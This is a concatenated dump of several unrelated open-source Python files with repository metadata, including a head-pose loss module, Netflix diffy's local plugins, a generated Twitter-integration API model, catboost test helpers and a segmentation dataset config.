reg_loss_v2 = reg_criterion(torch.acos(vector_cos(vector_label_v2, vector_pred_v2)), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
reg_loss_v3 = reg_criterion(torch.acos(vector_cos(vector_label_v3, vector_pred_v3)), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
#------------cls+reg loss-------------------
loss_v1 = cls_coef * (x_cls_loss_v1 + y_cls_loss_v1 + z_cls_loss_v1) + alpha * reg_loss_v1
loss_v2 = cls_coef * (x_cls_loss_v2 + y_cls_loss_v2 + z_cls_loss_v2) + alpha * reg_loss_v2
loss_v3 = cls_coef * (x_cls_loss_v3 + y_cls_loss_v3 + z_cls_loss_v3) + alpha * reg_loss_v3
# if add ortho loss
if add_ortho:
loss_ortho_12 = reg_criterion(torch.sum(vector_pred_v1 * vector_pred_v2, axis=1), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
loss_ortho_13 = reg_criterion(torch.sum(vector_pred_v1 * vector_pred_v3, axis=1), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
loss_ortho_23 = reg_criterion(torch.sum(vector_pred_v2 * vector_pred_v3, axis=1), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
#-----------total loss
loss_v1 += beta * (loss_ortho_12 + loss_ortho_13)
loss_v2 += beta * (loss_ortho_12 + loss_ortho_23)
loss_v3 += beta * (loss_ortho_23 + loss_ortho_13)
loss = [loss_v1, loss_v2, loss_v3]
# get predicted vector errors
cos_value_v1 = vector_cos(vector_pred_v1, vector_label_v1)
degree_error_v1 = torch.mean(torch.acos(cos_value_v1) * 180 / np.pi)
cos_value_v2 = vector_cos(vector_pred_v2, vector_label_v2)
degree_error_v2 = torch.mean(torch.acos(cos_value_v2) * 180 / np.pi)
cos_value_v3 = vector_cos(vector_pred_v3, vector_label_v3)
degree_error_v3 = torch.mean(torch.acos(cos_value_v3) * 180 / np.pi)
return loss, degree_error_v1, degree_error_v2, degree_error_v3
def classify2vector(x, y, z, softmax, num_classes):
"""
get vector from classify results
:param x: fc_x output,np.ndarray(66,)
:param y: fc_y output,np.ndarray(66,)
:param z: fc_z output,np.ndarray(66,)
:param softmax: softmax function
:param num_classes: number of classify, integer
:return:
"""
#idx_tensor = [idx for idx in range(num_classes)]
idx_tensor = np.linspace(-1, 1, num_classes)
idx_tensor = torch.FloatTensor(idx_tensor).cuda(1)
idx_tensor = np.linspace(-1, 1, num_classes)
idx_tensor = torch.FloatTensor(idx_tensor).cuda(0)
x_probability = softmax(x)
y_probability = softmax(y)
z_probability = softmax(z)
#x_pred = torch.sum(x_probability * idx_tensor, dim=-1) * (198 // num_classes) - 96
#y_pred = torch.sum(y_probability * idx_tensor, dim=-1) * (198 // num_classes) - 96
#z_pred = torch.sum(z_probability * idx_tensor, dim=-1) * (198 // num_classes) - 96
x_pred = torch.sum(x_probability * idx_tensor, dim=-1)
y_pred = torch.sum(y_probability * idx_tensor, dim=-1)
z_pred = torch.sum(z_probability * idx_tensor, dim=-1)
pred_vector = torch.stack([x_pred, y_pred, z_pred]).transpose(1, 0)
pred_vector = norm_vector(pred_vector)
#print(pred_vector)
# split to x,y,z
x_reg = pred_vector[:, 0]
y_reg = pred_vector[:, 1]
z_reg = pred_vector[:, 2]
return x_reg, y_reg, z_reg, pred_vector
def show_loss_distribute(loss_dict, analysis_dir, snapshot_name):
"""
:param loss_dict: {'angles':[[p,y,r],[],...],'degrees':[]}
:param analysis_dir:directory for saving image
:param snapshot_name:model snapshot name
:return:
"""
#plt.switch_backend('agg')
detail = snapshot_name
n = len(loss_dict["img_name"])
x = [i+1 for i in range(n)]
front_error = loss_dict['degree_error_f']
right_error = loss_dict['degree_error_r']
up_error = loss_dict['degree_error_u']
fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20,10))
fig.suptitle('Error distribution')
ax1.scatter(x, front_error)
ax2.scatter(x, right_error)
ax3.scatter(x, up_error)
plt.show()
#angles = np.array(loss_dict['angles']) * 180 / np.pi
#degrees_error = np.array(loss_dict['degree_error'])
#plt.subplots(figsize=(30, 10))
# figure pitch,yaw,roll
#for i, name in enumerate(['Pitch', 'Yaw', 'Roll']):
# plt.subplot(1, 3, i + 1)
# plt.xlim(-100, 105)
# plt.xticks([j for j in range(-100, 105, 20)], [j for j in range(-100, 105, 20)])
# plt.ylim(-100, 105)
# plt.yticks([j for j in range(-100, 105, 10)], [j for j in range(-100, 105, 10)])
# plt.scatter(angles[:, i], degrees_error, linewidths=0.2)
# plt.title(name + ":Loss distribution(" + detail + ")")
# plt.xlabel(name + ":GT")
# plt.ylabel(name + ":Loss(degree-error)")
# plt.grid()
plt.savefig(os.path.join(analysis_dir, detail + '.png'))
def collect_score(degree_dict, save_dir):
"""
:param save_dir:
:return:
"""
plt.switch_backend('agg')
x = np.array(range(0, 181, 5))
degree_error = degree_dict['degree_error']
mount = np.zeros(len(x))
for j in range(len(x)):
mount[j] = sum(degree_error < x[j])
y = mount / len(degree_error)
plt.plot(x, y, c="red", label="MobileNetV2")
plt.legend(loc='lower right', fontsize='x-small')
plt.xlabel('degrees upper limit')
plt.ylabel('accuracy')
plt.xlim(0, 105)
plt.ylim(0., 1.05)
plt.xticks([j for j in range(0, 105, 5)], [j for j in range(0, 105, 5)])
plt.yticks([j / 100 for j in range(0, 105, 5)], [j / 100 for j in range(0, 105, 5)])
plt.title("accuracy under degree upper limit")
plt.grid()
plt.savefig(save_dir + '/collect_score.png')
| 33.60137 | 156 | 0.619838 |
79547c715fbce146ff26b3b55d49f985cd525493 | 6,236 | py | Python | diffy/plugins/diffy_local/plugin.py | TheGableMethod/diffy | f3f22cfdee4103619355c0987a4bfedf9f053a29 | [
"Apache-2.0"
] | 577 | 2018-05-02T02:04:11.000Z | 2022-03-16T00:57:42.000Z | diffy/plugins/diffy_local/plugin.py | TheGableMethod/diffy | f3f22cfdee4103619355c0987a4bfedf9f053a29 | [
"Apache-2.0"
] | 220 | 2018-07-19T20:33:39.000Z | 2021-03-26T15:02:16.000Z | diffy/plugins/diffy_local/plugin.py | TheGableMethod/diffy | f3f22cfdee4103619355c0987a4bfedf9f053a29 | [
"Apache-2.0"
] | 69 | 2018-05-01T23:10:15.000Z | 2021-11-18T19:09:00.000Z | """
.. module: diffy.plugins.diffy_simple.plugin
:platform: Unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Kevin Glisson <kglisson@netflix.com>
"""
import os
import subprocess
import shlex
import datetime
import json
import logging
from typing import List
from jsondiff import diff
from diffy.config import CONFIG
from diffy.exceptions import BadArguments
from diffy.plugins import diffy_local as local
from diffy.plugins.bases import AnalysisPlugin, PersistencePlugin, PayloadPlugin, CollectionPlugin, TargetPlugin
logger = logging.getLogger(__name__)
def get_local_file_path(file_type: str, key: str) -> str:
"""Creates the full path for given local file."""
if file_type:
file_name = f"{file_type}-{key}.json"
else:
file_name = f"{key}.json"
return os.path.join(CONFIG.get("DIFFY_LOCAL_FILE_DIRECTORY"), file_name)
class SimpleAnalysisPlugin(AnalysisPlugin):
title = "simple"
slug = "local-simple"
description = "Perform simple differential analysis on collection results."
version = local.__version__
author = "Kevin Glisson"
author_url = "https://github.com/Netflix-Skunkworks/diffy.git"
def run(self, items: List[dict], **kwargs) -> List[dict]:
"""Run simple difference calculation on results based on a baseline."""
logger.debug("Performing simple local baseline analysis.")
if not kwargs.get("baseline"):
raise BadArguments("Cannot run simple analysis. No baseline found.")
for i in items:
i["diff"] = diff(kwargs["baseline"]["stdout"], i["stdout"])
return items
class ClusterAnalysisPlugin(AnalysisPlugin):
title = "cluster"
slug = "local-cluster"
description = "Perform cluster analysis on collection results."
version = local.__version__
author = "Kevin Glisson"
author_url = "https://github.com/Netflix-Skunkworks/diffy.git"
def run(self, items: List[dict], **kwargs) -> List[dict]:
"""Run cluster calculation on results based on a baseline."""
logger.debug("Performing simple local cluster analysis.")
return items
class FilePersistencePlugin(PersistencePlugin):
title = "file"
slug = "local-file"
description = "Store results locally for further analysis."
version = local.__version__
author = "Kevin Glisson"
author_url = "https://github.com/Netflix-Skunkworks/diffy.git"
def get(self, file_type: str, key: str, **kwargs) -> dict:
"""Fetch data from local file system."""
path = get_local_file_path(file_type, key)
logging.debug(f"Reading persistent data. Path: {path}")
if os.path.exists(path):
with open(path, "r") as f:
return json.load(f)
def get_all(self, file_type: str) -> List[dict]:
"""Fetches all files matching given prefix"""
path = os.path.join(CONFIG.get("DIFFY_LOCAL_FILE_DIRECTORY"))
items = []
for p in [os.path.abspath(x) for x in os.listdir(path)]:
file = p.split("/")[-1]
if file.startswith(file_type) and file.endswith(".json"):
with open(p, "r") as f:
items.append(json.load(f))
return items
def save(self, file_type: str, key: str, item: dict, **kwargs) -> None:
"""Save data to local file system."""
path = get_local_file_path(file_type, key)
logging.debug(f"Writing persistent data. Path: {path}")
with open(path, "w") as f:
json.dump(item, f)
class CommandPayloadPlugin(PayloadPlugin):
title = "command"
slug = "local-command"
description = "Sends command without any modification."
version = local.__version__
author = "Kevin Glisson"
author_url = "https://github.com/Netflix-Skunkworks/diffy.git"
def generate(self, incident: str, **kwargs) -> dict:
return CONFIG.get('DIFFY_PAYLOAD_LOCAL_COMMANDS')
class LocalShellCollectionPlugin(CollectionPlugin):
title = 'command'
slug = 'local-shell-collection'
description = 'Executes payload commands via local shell.'
version = local.__version__
author = 'Alex Maestretti'
author_url = 'https://github.com/Netflix-Skunkworks/diffy.git'
def get(self, targets: List[str], commands: List[str], **kwargs) -> dict:
"""Queries local system target via subprocess shell.
:returns command results as dict {
'command_id': [
{
'instance_id': 'i-123343243',
'status': 'success',
'collected_at' : 'dtg'
'stdout': {json osquery result}
}
...
]
}
"""
# TODO: check if we are root, warn user if not we may not get a full baseline
results = {}
for idx, cmd in enumerate(commands):
logger.debug(f'Querying local system with: {cmd}')
# format command which is a string with an osqueryi shell command into a list of args for subprocess
formatted_cmd = shlex.split(cmd)
# TODO support python37
process_result = subprocess.run(formatted_cmd, stdout=subprocess.PIPE) # python36 only
stdout = process_result.stdout.decode('utf-8')
# TODO: check return status and pass stderr if needed
results[idx] = [{
'instance_id': 'localhost',
'status': 'success',
'collected_at': datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"),
'stdout': json.loads(stdout)
}]
logger.debug(f'Results[{idx}] : {format(json.dumps(stdout, indent=2))}')
return results
class LocalTargetPlugin(TargetPlugin):
title = 'command'
slug = 'local-target'
description = 'Targets the local system for collection.'
version = local.__version__
author = 'Alex Maestretti'
author_url = 'https://github.com/Netflix-Skunkworks/diffy.git'
def get(self, key, **kwargs):
return 'local' # returns arbitrary value that is ignored by local-collection
| 34.076503 | 112 | 0.63374 |
79547cb55b685aff822257a06ee558ae5217e4af | 16,684 | py | Python | build/PureCloudPlatformClientV2/models/twitter_integration.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | 10 | 2019-02-22T00:27:08.000Z | 2021-09-12T23:23:44.000Z | libs/PureCloudPlatformClientV2/models/twitter_integration.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | 5 | 2018-06-07T08:32:00.000Z | 2021-07-28T17:37:26.000Z | libs/PureCloudPlatformClientV2/models/twitter_integration.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | 6 | 2020-04-09T17:43:07.000Z | 2022-02-17T08:48:05.000Z | # coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class TwitterIntegration(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
TwitterIntegration - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'id': 'str',
'name': 'str',
'access_token_key': 'str',
'consumer_key': 'str',
'username': 'str',
'user_id': 'str',
'status': 'str',
'tier': 'str',
'env_name': 'str',
'recipient': 'DomainEntityRef',
'date_created': 'datetime',
'date_modified': 'datetime',
'created_by': 'DomainEntityRef',
'modified_by': 'DomainEntityRef',
'version': 'int',
'create_status': 'str',
'create_error': 'ErrorBody',
'self_uri': 'str'
}
self.attribute_map = {
'id': 'id',
'name': 'name',
'access_token_key': 'accessTokenKey',
'consumer_key': 'consumerKey',
'username': 'username',
'user_id': 'userId',
'status': 'status',
'tier': 'tier',
'env_name': 'envName',
'recipient': 'recipient',
'date_created': 'dateCreated',
'date_modified': 'dateModified',
'created_by': 'createdBy',
'modified_by': 'modifiedBy',
'version': 'version',
'create_status': 'createStatus',
'create_error': 'createError',
'self_uri': 'selfUri'
}
self._id = None
self._name = None
self._access_token_key = None
self._consumer_key = None
self._username = None
self._user_id = None
self._status = None
self._tier = None
self._env_name = None
self._recipient = None
self._date_created = None
self._date_modified = None
self._created_by = None
self._modified_by = None
self._version = None
self._create_status = None
self._create_error = None
self._self_uri = None
@property
def id(self):
"""
Gets the id of this TwitterIntegration.
A unique Integration Id
:return: The id of this TwitterIntegration.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this TwitterIntegration.
A unique Integration Id
:param id: The id of this TwitterIntegration.
:type: str
"""
self._id = id
@property
def name(self):
"""
Gets the name of this TwitterIntegration.
The name of the Twitter Integration
:return: The name of this TwitterIntegration.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this TwitterIntegration.
The name of the Twitter Integration
:param name: The name of this TwitterIntegration.
:type: str
"""
self._name = name
@property
def access_token_key(self):
"""
Gets the access_token_key of this TwitterIntegration.
The Access Token Key from Twitter messenger
:return: The access_token_key of this TwitterIntegration.
:rtype: str
"""
return self._access_token_key
@access_token_key.setter
def access_token_key(self, access_token_key):
"""
Sets the access_token_key of this TwitterIntegration.
The Access Token Key from Twitter messenger
:param access_token_key: The access_token_key of this TwitterIntegration.
:type: str
"""
self._access_token_key = access_token_key
@property
def consumer_key(self):
"""
Gets the consumer_key of this TwitterIntegration.
The Consumer Key from Twitter messenger
:return: The consumer_key of this TwitterIntegration.
:rtype: str
"""
return self._consumer_key
@consumer_key.setter
def consumer_key(self, consumer_key):
"""
Sets the consumer_key of this TwitterIntegration.
The Consumer Key from Twitter messenger
:param consumer_key: The consumer_key of this TwitterIntegration.
:type: str
"""
self._consumer_key = consumer_key
@property
def username(self):
"""
Gets the username of this TwitterIntegration.
The Username from Twitter
:return: The username of this TwitterIntegration.
:rtype: str
"""
return self._username
@username.setter
def username(self, username):
"""
Sets the username of this TwitterIntegration.
The Username from Twitter
:param username: The username of this TwitterIntegration.
:type: str
"""
self._username = username
@property
def user_id(self):
"""
Gets the user_id of this TwitterIntegration.
The UserId from Twitter
:return: The user_id of this TwitterIntegration.
:rtype: str
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""
Sets the user_id of this TwitterIntegration.
The UserId from Twitter
:param user_id: The user_id of this TwitterIntegration.
:type: str
"""
self._user_id = user_id
@property
def status(self):
"""
Gets the status of this TwitterIntegration.
The status of the Twitter Integration
:return: The status of this TwitterIntegration.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this TwitterIntegration.
The status of the Twitter Integration
:param status: The status of this TwitterIntegration.
:type: str
"""
self._status = status
@property
def tier(self):
"""
Gets the tier of this TwitterIntegration.
The type of twitter account to be used for the integration
:return: The tier of this TwitterIntegration.
:rtype: str
"""
return self._tier
@tier.setter
def tier(self, tier):
"""
Sets the tier of this TwitterIntegration.
The type of twitter account to be used for the integration
:param tier: The tier of this TwitterIntegration.
:type: str
"""
allowed_values = ["premium", "enterprise"]
if tier.lower() not in map(str.lower, allowed_values):
# print("Invalid value for tier -> " + tier)
self._tier = "outdated_sdk_version"
else:
self._tier = tier
@property
def env_name(self):
"""
Gets the env_name of this TwitterIntegration.
The Twitter environment name, e.g.: env-beta (required for premium tier)
:return: The env_name of this TwitterIntegration.
:rtype: str
"""
return self._env_name
@env_name.setter
def env_name(self, env_name):
"""
Sets the env_name of this TwitterIntegration.
The Twitter environment name, e.g.: env-beta (required for premium tier)
:param env_name: The env_name of this TwitterIntegration.
:type: str
"""
self._env_name = env_name
@property
def recipient(self):
"""
Gets the recipient of this TwitterIntegration.
The recipient associated to the Twitter Integration. This recipient is used to associate a flow to an integration
:return: The recipient of this TwitterIntegration.
:rtype: DomainEntityRef
"""
return self._recipient
@recipient.setter
def recipient(self, recipient):
"""
Sets the recipient of this TwitterIntegration.
The recipient associated to the Twitter Integration. This recipient is used to associate a flow to an integration
:param recipient: The recipient of this TwitterIntegration.
:type: DomainEntityRef
"""
self._recipient = recipient
@property
def date_created(self):
"""
Gets the date_created of this TwitterIntegration.
Date this Integration was created. Date time is represented as an ISO-8601 string. For example: yyyy-MM-ddTHH:mm:ss[.mmm]Z
:return: The date_created of this TwitterIntegration.
:rtype: datetime
"""
return self._date_created
@date_created.setter
def date_created(self, date_created):
"""
Sets the date_created of this TwitterIntegration.
Date this Integration was created. Date time is represented as an ISO-8601 string. For example: yyyy-MM-ddTHH:mm:ss[.mmm]Z
:param date_created: The date_created of this TwitterIntegration.
:type: datetime
"""
self._date_created = date_created
@property
def date_modified(self):
"""
Gets the date_modified of this TwitterIntegration.
Date this Integration was modified. Date time is represented as an ISO-8601 string. For example: yyyy-MM-ddTHH:mm:ss[.mmm]Z
:return: The date_modified of this TwitterIntegration.
:rtype: datetime
"""
return self._date_modified
@date_modified.setter
def date_modified(self, date_modified):
"""
Sets the date_modified of this TwitterIntegration.
Date this Integration was modified. Date time is represented as an ISO-8601 string. For example: yyyy-MM-ddTHH:mm:ss[.mmm]Z
:param date_modified: The date_modified of this TwitterIntegration.
:type: datetime
"""
self._date_modified = date_modified
@property
def created_by(self):
"""
Gets the created_by of this TwitterIntegration.
User reference that created this Integration
:return: The created_by of this TwitterIntegration.
:rtype: DomainEntityRef
"""
return self._created_by
@created_by.setter
def created_by(self, created_by):
"""
Sets the created_by of this TwitterIntegration.
User reference that created this Integration
:param created_by: The created_by of this TwitterIntegration.
:type: DomainEntityRef
"""
self._created_by = created_by
@property
def modified_by(self):
"""
Gets the modified_by of this TwitterIntegration.
User reference that last modified this Integration
:return: The modified_by of this TwitterIntegration.
:rtype: DomainEntityRef
"""
return self._modified_by
@modified_by.setter
def modified_by(self, modified_by):
"""
Sets the modified_by of this TwitterIntegration.
User reference that last modified this Integration
:param modified_by: The modified_by of this TwitterIntegration.
:type: DomainEntityRef
"""
self._modified_by = modified_by
@property
def version(self):
"""
Gets the version of this TwitterIntegration.
Version number required for updates.
:return: The version of this TwitterIntegration.
:rtype: int
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this TwitterIntegration.
Version number required for updates.
:param version: The version of this TwitterIntegration.
:type: int
"""
self._version = version
@property
def create_status(self):
"""
Gets the create_status of this TwitterIntegration.
Status of asynchronous create operation
:return: The create_status of this TwitterIntegration.
:rtype: str
"""
return self._create_status
@create_status.setter
def create_status(self, create_status):
"""
Sets the create_status of this TwitterIntegration.
Status of asynchronous create operation
:param create_status: The create_status of this TwitterIntegration.
:type: str
"""
allowed_values = ["Initiated", "Completed", "Error"]
if create_status.lower() not in map(str.lower, allowed_values):
# print("Invalid value for create_status -> " + create_status)
self._create_status = "outdated_sdk_version"
else:
self._create_status = create_status
@property
def create_error(self):
"""
Gets the create_error of this TwitterIntegration.
Error information returned, if createStatus is set to Error
:return: The create_error of this TwitterIntegration.
:rtype: ErrorBody
"""
return self._create_error
@create_error.setter
def create_error(self, create_error):
"""
Sets the create_error of this TwitterIntegration.
Error information returned, if createStatus is set to Error
:param create_error: The create_error of this TwitterIntegration.
:type: ErrorBody
"""
self._create_error = create_error
@property
def self_uri(self):
"""
Gets the self_uri of this TwitterIntegration.
The URI for this object
:return: The self_uri of this TwitterIntegration.
:rtype: str
"""
return self._self_uri
@self_uri.setter
def self_uri(self, self_uri):
"""
Sets the self_uri of this TwitterIntegration.
The URI for this object
:param self_uri: The self_uri of this TwitterIntegration.
:type: str
"""
self._self_uri = self_uri
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 28.716007 | 131 | 0.593443 |
795480e9b38e5f2f570f738b1942a5c0f676e524 | 880 | py | Python | es_enas/util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | 23,901 | 2018-10-04T19:48:53.000Z | 2022-03-31T21:27:42.000Z | es_enas/util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | 891 | 2018-11-10T06:16:13.000Z | 2022-03-31T10:42:34.000Z | es_enas/util.py | admariner/google-research | 7cee4b22b925581d912e8d993625c180da2a5a4f | [
"Apache-2.0"
] | 6,047 | 2018-10-12T06:31:02.000Z | 2022-03-31T13:59:28.000Z | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains logging/saving utilities."""
import csv
import tensorflow as tf
def log_row(csv_file, row):
with tf.gfile.Open(csv_file, 'ab') as csvfile:
cw = csv.writer(
csvfile, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
cw.writerow(row)
| 33.846154 | 74 | 0.738636 |
795481e95914a38bc2800e4065717858155f3bb4 | 5,856 | py | Python | catboost/pytest/lib/common_helpers.py | EkaterinaPogodina/catboost | 4628e86e978da2ec5e4d42f6b8d05e0b5e8aab30 | [
"Apache-2.0"
] | 2 | 2019-07-10T10:49:09.000Z | 2020-06-19T11:40:04.000Z | catboost/pytest/lib/common_helpers.py | EkaterinaPogodina/catboost | 4628e86e978da2ec5e4d42f6b8d05e0b5e8aab30 | [
"Apache-2.0"
] | null | null | null | catboost/pytest/lib/common_helpers.py | EkaterinaPogodina/catboost | 4628e86e978da2ec5e4d42f6b8d05e0b5e8aab30 | [
"Apache-2.0"
] | null | null | null | import csv
import json
import os
import random
import shutil
from copy import deepcopy
import numpy as np
__all__ = [
'DelayedTee',
'binary_path',
'compare_evals',
'compare_evals_with_precision',
'compare_metrics_with_diff',
'generate_random_labeled_set',
'permute_dataset_columns',
'remove_time_from_json',
'test_output_path',
]
try:
import yatest
binary_path = yatest.common.binary_path
test_output_path = yatest.common.test_output_path
except ImportError:
def binary_path(*path):
return os.path.join(os.environ["BINARY_PATH"], *path)
def test_output_path(*path):
return os.path.join(os.getcwd(), *path)
def remove_time_from_json(filename):
with open(filename) as f:
log = json.load(f)
iterations = log['iterations']
for i, iter_info in enumerate(iterations):
for key in ['remaining_time', 'passed_time']:
if key in iter_info.keys():
del iter_info[key]
with open(filename, 'w') as f:
json.dump(log, f, sort_keys=True)
return filename
# rewinds dst_stream to the start of the captured output so you can read it
class DelayedTee(object):
def __init__(self, src_stream, dst_stream):
self.src_stream = src_stream
self.dst_stream = dst_stream
def __enter__(self):
self.src_stream.flush()
self._old_src_stream = os.dup(self.src_stream.fileno())
self._old_dst_stream_pos = self.dst_stream.tell()
os.dup2(self.dst_stream.fileno(), self.src_stream.fileno())
def __exit__(self, exc_type, exc_value, traceback):
self.src_stream.flush()
os.dup2(self._old_src_stream, self.src_stream.fileno())
self.dst_stream.seek(self._old_dst_stream_pos)
shutil.copyfileobj(self.dst_stream, self.src_stream)
self.dst_stream.seek(self._old_dst_stream_pos)
def permute_dataset_columns(test_pool_path, cd_path, seed=123):
permuted_test_path = test_output_path('permuted_test')
permuted_cd_path = test_output_path('permuted_cd')
generator = random.Random(seed)
column_count = len(open(test_pool_path).readline().split('\t'))
permutation = list(range(column_count))
generator.shuffle(permutation)
with open(cd_path) as original_cd, open(permuted_cd_path, 'w') as permuted_cd:
for line in original_cd:
line = line.strip()
if not line:
continue
index, rest = line.split('\t', 1)
permuted_cd.write('{}\t{}\n'.format(permutation.index(int(index)), rest))
with open(test_pool_path) as test_pool, open(permuted_test_path, 'w') as permuted_test:
for line in test_pool:
splitted = line.strip().split('\t')
permuted_test.write('\t'.join([splitted[i] for i in permutation]) + '\n')
return permuted_test_path, permuted_cd_path
def generate_random_labeled_set(nrows, nvals, labels, seed=20181219, prng=None):
if prng is None:
prng = np.random.RandomState(seed=seed)
label = prng.choice(labels, [nrows, 1])
feature = prng.random_sample([nrows, nvals])
return np.concatenate([label, feature], axis=1)
BY_CLASS_METRICS = ['AUC', 'Precision', 'Recall', 'F1']
def compare_metrics_with_diff(custom_metric, fit_eval, calc_eval, eps=1e-7):
csv_fit = csv.reader(open(fit_eval, "r"), dialect='excel-tab')
csv_calc = csv.reader(open(calc_eval, "r"), dialect='excel-tab')
head_fit = next(csv_fit)
head_calc = next(csv_calc)
if isinstance(custom_metric, basestring):
custom_metric = [custom_metric]
for metric_name in deepcopy(custom_metric):
if metric_name in BY_CLASS_METRICS:
custom_metric.remove(metric_name)
for fit_metric_name in head_fit:
if fit_metric_name[:len(metric_name)] == metric_name:
custom_metric.append(fit_metric_name)
col_idx_fit = {}
col_idx_calc = {}
for metric_name in custom_metric:
col_idx_fit[metric_name] = head_fit.index(metric_name)
col_idx_calc[metric_name] = head_calc.index(metric_name)
while True:
try:
line_fit = next(csv_fit)
line_calc = next(csv_calc)
for metric_name in custom_metric:
fit_value = float(line_fit[col_idx_fit[metric_name]])
calc_value = float(line_calc[col_idx_calc[metric_name]])
max_abs = max(abs(fit_value), abs(calc_value))
err = abs(fit_value - calc_value) / max_abs if max_abs > 0 else 0
if err > eps:
raise Exception('{}, iter {}: fit vs calc = {} vs {}, err = {} > eps = {}'.format(
metric_name, line_fit[0], fit_value, calc_value, err, eps))
except StopIteration:
break
def compare_evals(fit_eval, calc_eval):
csv_fit = csv.reader(open(fit_eval, "r"), dialect='excel-tab')
csv_calc = csv.reader(open(calc_eval, "r"), dialect='excel-tab')
while True:
try:
line_fit = next(csv_fit)
line_calc = next(csv_calc)
if line_fit[:-1] != line_calc:
return False
except StopIteration:
break
return True
def compare_evals_with_precision(fit_eval, calc_eval, rtol=1e-6, skip_last_column_in_fit=True):
array_fit = np.loadtxt(fit_eval, delimiter='\t', skiprows=1, ndmin=2)
array_calc = np.loadtxt(calc_eval, delimiter='\t', skiprows=1, ndmin=2)
header_fit = open(fit_eval, "r").readline().split()
header_calc = open(calc_eval, "r").readline().split()
if skip_last_column_in_fit:
array_fit = np.delete(array_fit, np.s_[-1], 1)
header_fit = header_fit[:-1]
if header_fit != header_calc:
return False
return np.all(np.isclose(array_fit, array_calc, rtol=rtol))
| 34.857143 | 102 | 0.654713 |
79548272bcc99ddebad7312b4d36d9cbdafa6509 | 2,146 | py | Python | configs/_base_/datasets/rain_filtering.py | kencan7749/mmsegmentation | e0fe1cb56e5b91f85e33a3ecc3afbeaa31f647e8 | [
"Apache-2.0"
] | null | null | null | configs/_base_/datasets/rain_filtering.py | kencan7749/mmsegmentation | e0fe1cb56e5b91f85e33a3ecc3afbeaa31f647e8 | [
"Apache-2.0"
] | null | null | null | configs/_base_/datasets/rain_filtering.py | kencan7749/mmsegmentation | e0fe1cb56e5b91f85e33a3ecc3afbeaa31f647e8 | [
"Apache-2.0"
] | null | null | null | # dataset settings
dataset_type = "ParticleDataset"
data_root ="data/rain_filtering_v2"#"/var/datasets/rain_filtering/"
#the order of mean or std should be ['first_depth', 'first_intensity', 'first_return_type',
# 'last_depth', 'last_intensity', 'last_return_type']
img_norm_cfg = dict(
mean=[5038.093, 8.658958, 5.960323, 6241.105,
9.026124, 5.805868], std=[2592.0776, 5.1905198, 1.5205307, 2186.4004,
5.1824026, 1.6501048], to_rgb=False) # to_rgb is False since each image are loaded gray
crop_size = (32, 32) # crop 32x32 from 40x1800
img_scale = (40, 1800)
train_pipeline = [
dict(type='LoadMultiImageFromFile'),
dict(type='LoadAnnotations'),
dict(type='RandomCrop', crop_size=crop_size, cat_max_ratio=1.0),
dict(type='RandomFlip', prob=0.5),
dict(type='MultiNormalize', **img_norm_cfg), #muzu
